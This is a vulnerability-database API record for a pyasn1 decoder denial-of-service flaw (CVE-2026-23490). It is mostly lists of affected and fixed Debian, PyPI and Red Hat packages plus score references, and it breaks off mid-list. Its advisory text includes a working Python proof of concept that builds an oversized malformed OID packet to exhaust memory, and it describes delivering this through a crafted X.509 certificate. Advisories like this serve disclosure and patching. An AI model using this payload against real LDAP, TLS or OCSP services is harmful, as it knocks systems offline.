Lookup for vulnerabilities affecting packages.

GET /api/vulnerabilities/20254?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20254?format=api",
    "vulnerability_id": "VCID-bptp-5gn6-eucd",
    "summary": "pyasn1 has a DoS vulnerability in decoder\n### Summary\n\nAfter reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.\n\n### Details\n\nThe integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496\n\n### PoC\n\nFor the DoS:\n```py\nimport pyasn1.codec.ber.decoder as decoder\nimport pyasn1.type.univ as univ\nimport sys\nimport resource\n\n# Deliberately set memory limit to display PoC\ntry:\n    resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))\n    print(\"[*] Memory limit set to 100MB\")\nexcept:\n    print(\"[-] Could not set memory limit\")\n\n# Test with different payload sizes to find the DoS threshold\npayload_size_mb = int(sys.argv[1])\n\nprint(f\"[*] Testing with {payload_size_mb}MB payload...\")\n\npayload_size = payload_size_mb * 1024 * 1024\n# Create payload with continuation octets\n# Each 0x81 byte indicates continuation, causing bit shifting in decoder\npayload = b'\\x81' * payload_size + b'\\x00'\nlength = len(payload)\n\n# DER length encoding (supports up to 4GB)\nif length < 128:\n    length_bytes = bytes([length])\nelif length < 256:\n    length_bytes = b'\\x81' + length.to_bytes(1, 'big')\nelif length < 256**2:\n    length_bytes = b'\\x82' + length.to_bytes(2, 'big')\nelif length < 256**3:\n    length_bytes = b'\\x83' + length.to_bytes(3, 'big')\nelse:\n    # 4 bytes can handle up to 4GB\n    length_bytes = b'\\x84' + length.to_bytes(4, 'big')\n\n# Use OID (0x06) for more aggressive parsing\nmalicious_packet = b'\\x06' + length_bytes + payload\n\nprint(f\"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB\")\n\ntry:\n    print(\"[*] Decoding (this may take time or exhaust memory)...\")\n    result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())\n\n    print(f'[+] Decoded successfully')\n    print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')\n\n    # Try to convert to string\n    print('[*] Converting to string...')\n    try:\n        str_result = str(result[0])\n        print(f'[+] String succeeded: {len(str_result)} chars')\n        if len(str_result) > 10000:\n            print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')\n    except MemoryError:\n        print(f'[-] MemoryError during string conversion!')\n    except Exception as e:\n        print(f'[-] {type(e).__name__} during string conversion')\n\nexcept MemoryError:\n    print('[-] MemoryError: Out of memory!')\nexcept Exception as e:\n    print(f'[-] Error: {type(e).__name__}: {e}')\n\n\nprint(\"\\n[*] Test completed\")\n```\n\n\nScreenshots with the results:\n\n#### DoS\n<img width=\"944\" height=\"207\" alt=\"Screenshot_20251219_160840\" src=\"https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f\" />\n\n<img width=\"931\" height=\"231\" alt=\"Screenshot_20251219_152815\" src=\"https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa\" />\n\n#### Leak analysis\n\nA potential heap leak was investigated but came back clean:\n```\n[*] Creating 1000KB payload...\n[*] Decoding with pyasn1...\n[*] Materializing to string...\n[+] Decoded 2157784 characters\n[+] Binary representation: 896001 bytes\n[+] Dumped to heap_dump.bin\n\n[*] First 64 bytes (hex):\n  01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081\n\n[*] First 64 bytes (ASCII/hex dump):\n  0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02  ..... @..... @..\n  0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08  ... @..... @....\n  0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20  . @..... @..... \n  0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81  @..... @..... @.\n\n[*] Digit distribution analysis:\n  '0':  10.1%\n  '1':   9.9%\n  '2':  10.0%\n  '3':   9.9%\n  '4':   9.9%\n  '5':  10.0%\n  '6':  10.0%\n  '7':  10.0%\n  '8':   9.9%\n  '9':  10.1%\n```\n\n### Scenario\n\n1. An attacker creates a malicious X.509 certificate.\n2. The application validates certificates.\n3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.\n\n### Impact\n\nThis issue can affect resource consumption and hang systems or stop services.\nThis may affect:\n- LDAP servers\n- TLS/SSL endpoints\n- OCSP responders\n- etc.\n\n### Recommendation\n\nAdd a limit to the allowed bytes in the decoder.",
    "aliases": [
        {
            "alias": "CVE-2026-23490"
        },
        {
            "alias": "GHSA-63vm-454h-vhhq"
        }
    ],
    "fixed_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/936081?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.4.8-1?distro=trixie",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/936082?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.4.8-1%2Bdeb11u1?distro=trixie",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-1%252Bdeb11u1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/936079?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.4.8-3?distro=trixie",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-3%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1026210?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.4.8-3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/936080?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.4.8-3%2Bdeb12u1?distro=trixie",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-3%252Bdeb12u1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/936085?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.6.1-1%2Bdeb13u1?distro=trixie",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.6.1-1%252Bdeb13u1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/936084?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.6.2-1?distro=trixie",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.6.2-1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/936083?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.6.3-1?distro=trixie",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.6.3-1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/61752?format=api",
            "purl": "pkg:pypi/pyasn1@0.6.2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyasn1@0.6.2"
        }
    ],
    "affected_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1054530?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.0.5a-2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.0.5a-2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1054531?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.0.8a-1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.0.8a-1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1054532?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.0.11a-1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.0.11a-1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1054533?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.1.3-1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.1.3-1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1054534?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.1.7-1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.1.7-1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1054535?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.1.9-1~bpo8%2B1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.1.9-1~bpo8%252B1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1054536?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.1.9-2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.1.9-2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1054537?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.4.2-3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.2-3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1026209?format=api",
            "purl": "pkg:deb/debian/pyasn1@0.4.8-1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/pyasn1@0.4.8-1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/61751?format=api",
            "purl": "pkg:pypi/pyasn1@0.6.1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-kth3-bvbt-gbgk"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyasn1@0.6.1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87294?format=api",
            "purl": "pkg:rpm/redhat/automation-controller@4.6.26-1?arch=el8ap",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-fm8w-bycx-4yex"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.6.26-1%3Farch=el8ap"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87295?format=api",
            "purl": "pkg:rpm/redhat/automation-controller@4.6.26-1?arch=el9ap",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-fm8w-bycx-4yex"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.6.26-1%3Farch=el9ap"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87304?format=api",
            "purl": "pkg:rpm/redhat/automation-controller@4.7.9-1?arch=el9ap",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                },
                {
                    "vulnerability": "VCID-fm8w-bycx-4yex"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.7.9-1%3Farch=el9ap"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87382?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.2.1-65.el8_4?arch=27",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.2.1-65.el8_4%3Farch=27"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87393?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.2.1-89.el8_6?arch=21",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.2.1-89.el8_6%3Farch=21"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87394?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.2.1-112.el8_8?arch=16",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.2.1-112.el8_8%3Farch=16"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87392?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.2.1-129.el8_10?arch=21",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.2.1-129.el8_10%3Farch=21"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87398?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.10.0-20.el9_0?arch=28",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-20.el9_0%3Farch=28"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87375?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.10.0-43.el9_2?arch=19",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-43.el9_2%3Farch=19"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87376?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.10.0-62.el9_4?arch=22",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-62.el9_4%3Farch=22"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87401?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.10.0-86.el9_6?arch=15",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-86.el9_6%3Farch=15"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87387?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.10.0-98.el9_7?arch=5",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.10.0-98.el9_7%3Farch=5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87402?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.16.0-5.el10_0?arch=8",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.16.0-5.el10_0%3Farch=8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87389?format=api",
            "purl": "pkg:rpm/redhat/fence-agents@4.16.0-13.el10_1?arch=2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.16.0-13.el10_1%3Farch=2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87390?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.1.9-7.el7_9?arch=2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.1.9-7.el7_9%3Farch=2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87379?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_2?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_2%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87383?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_4?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_4%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87381?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_6?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_6%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87385?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_8?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_8%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87374?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_10?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.3.7-6.el8_10%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87386?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_0?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_0%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87388?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_2?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_2%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87391?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_4?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_4%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87396?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_6?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-6.el9_6%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87384?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.4.8-7?arch=el9_7",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.4.8-7%3Farch=el9_7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87397?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.6.2-1?arch=el10_1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.6.2-1%3Farch=el10_1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87380?format=api",
            "purl": "pkg:rpm/redhat/python-pyasn1@0.6.2-1.el10_0?arch=1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-pyasn1@0.6.2-1.el10_0%3Farch=1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87395?format=api",
            "purl": "pkg:rpm/redhat/resource-agents@4.1.1-61.el7_9?arch=23",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.1.1-61.el7_9%3Farch=23"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87377?format=api",
            "purl": "pkg:rpm/redhat/resource-agents@4.1.1-90.el8_4?arch=23",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.1.1-90.el8_4%3Farch=23"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87399?format=api",
            "purl": "pkg:rpm/redhat/resource-agents@4.9.0-16.el8_6?arch=20",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.9.0-16.el8_6%3Farch=20"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87378?format=api",
            "purl": "pkg:rpm/redhat/resource-agents@4.9.0-40.el8_8?arch=16",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.9.0-40.el8_8%3Farch=16"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/87400?format=api",
            "purl": "pkg:rpm/redhat/resource-agents@4.9.0-54.el8_10?arch=28",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bptp-5gn6-eucd"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/resource-agents@4.9.0-54.el8_10%3Farch=28"
        }
    ],
    "references": [
        {
            "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.5",
                    "scoring_system": "cvssv3",
                    "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                }
            ],
            "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json"
        },
        {
            "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23490",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05876",
                    "published_at": "2026-04-29T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05866",
                    "published_at": "2026-04-26T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05829",
                    "published_at": "2026-04-24T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05797",
                    "published_at": "2026-04-21T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05649",
                    "published_at": "2026-04-18T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05637",
                    "published_at": "2026-04-16T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05682",
                    "published_at": "2026-04-13T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05688",
                    "published_at": "2026-04-12T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05696",
                    "published_at": "2026-04-11T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05716",
                    "published_at": "2026-04-09T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.0569",
                    "published_at": "2026-04-08T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05652",
                    "published_at": "2026-04-07T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05659",
                    "published_at": "2026-04-04T12:55:00Z"
                },
                {
                    "value": "0.00021",
                    "scoring_system": "epss",
                    "scoring_elements": "0.05618",
                    "published_at": "2026-04-02T12:55:00Z"
                }
            ],
            "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23490"
        },
        {
            "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490",
            "reference_id": "",
            "reference_type": "",
            "scores": [],
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490"
        },
        {
